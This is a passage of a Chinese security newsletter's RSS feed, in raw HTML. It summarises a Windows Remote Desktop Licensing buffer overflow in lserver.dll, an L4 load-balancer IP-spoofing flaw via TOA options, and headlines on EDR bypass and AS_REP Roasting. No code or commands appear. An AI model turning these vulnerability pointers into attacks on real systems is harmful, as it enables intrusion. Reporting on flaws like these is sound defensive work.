	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:赛博昆仑的一个小哥，之前写的分析和demo. 该rpc的相关检测和特征点，其实上个月补丁日，就有不少国外公司发了的.</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPG5DKBibC0HribxoKicR4Tnnl9XUg5GrDrfu296czDNqF7qc8uhsRGqAFQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPG5DKBibC0HribxoKicR4Tnnl9XUg5GrDrfu296czDNqF7qc8uhsRGqAFQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844185148818418"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows远程桌面许可证服务存在安全漏洞，攻击者可以利用该漏洞实现远程代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的 root cause 在于<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">lserver.dll</code>中的<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">HashChallengeData</code>函数处理不当，导致缓冲区溢出。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过对比修复前后的代码，可以看出补丁增加了对参数值的检查，以防止越界操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用该漏洞的PoC可以通过构造特定格式的数据包并发送给服务端来实现，这表明在实际环境中可能存在被动攻击的风险。</section></li></ul>
	<br/>
	<p>🏷️: Windows, 远程桌面, 漏洞, RPC服务, 安全分析</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x10			<a href="https://mp.weixin.qq.com/s?__biz=MzUyMDM0OTY5NA==&amp;mid=2247485017&amp;idx=1&amp;sn=8629da1a7c1cc5b6d48dd6e81e1f0329&amp;scene=21#wechat_redirect" style="color: rgb(0, 150, 136);border-style: none none solid;border-width: 1px;border-color: rgb(30, 107, 184) rgb(30, 107, 184) rgb(0, 150, 136);border-radius: 0px;" data-linktype="2"> L4LB四层负载均衡中的IP伪造漏洞详解</a></span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文详细介绍了L4LB四层负载均衡中的IP伪造漏洞，探讨了漏洞的发现、影响、原理以及如何修复。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.14074074074074075" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=2d5b8bdf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPtXDJHiafstDKIQZ5aicr6c6iaP8dwRbrdfsba7eJQCqlIOw6S4VlxY3FA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.27037037037037037" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c6174983&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPAs102h4zjKj0PdUyv8vC89xbs79DfTA8SDBWX7KLZ9xrvjktPdewTA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.2462962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c137d334&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPlBhicMHGGdKMduSTP6H9Sic4rHhg0BSMIlI6k1Cd3Wib7Teg7Adx7sIng%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPYBFTsYDfIJzfZwsQqvu4JTr4CUGjJYQ6vlzvWzpBliaEA2XR38cDaPA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPYBFTsYDfIJzfZwsQqvu4JTr4CUGjJYQ6vlzvWzpBliaEA2XR38cDaPA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855182158814111"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">L4LB四层负载均衡在FNAT模式下未能清除TCP Option中的恶意构造的TOA信息，导致IP伪造漏洞的存在。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IP伪造可能导致基于IP策略的安全系统完全失效，造成极大的风险损失。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的发现是在零信任四层负载均衡产品的研发过程中意外发现的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">L4LB在处理客户端TCP Option时的策略差异是安全问题的根源。</section></li></ul>
	<br/>
	<p>🏷️: 负载均衡, IP伪造, 漏洞修复, 网络安全</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=42c97de5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPdcicJ2iaibsG3ZGAKicGaIIsSA0mV9W9tarQpPic4pibeVVke0Cp7oria4P3g%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487708">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=07fd665f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487708%26idx%3D1%26sn%3Dcd5dd5acf5c37615c972d5742a0818f8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 12 Aug 2024 17:52:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0805 | 域安全、红蓝工具</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487701&amp;idx=1&amp;sn=a13601e7051b7a0257363a12c4cf310e</link>
      <description>涵盖.NET Remoting新技巧、VEH绕过EDR、AppLocker漏洞、Python SMB 445端口接管、红蓝队攻防策略之AS_REP Roasting等</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-08-05 19:19</span> <span style="display: inline-block;">北京</span>
</p>

<p>涵盖.NET Remoting新技巧、VEH绕过EDR、AppLocker漏洞、Python SMB 445端口接管、红蓝队攻防策略之AS_REP Roasting等</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=754b5519&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsKlCFa31px06QwWUhYOdyK6LdUia1Eq9HdibOTibWC4BU10SGkfNZsSwdw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-08-05 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, 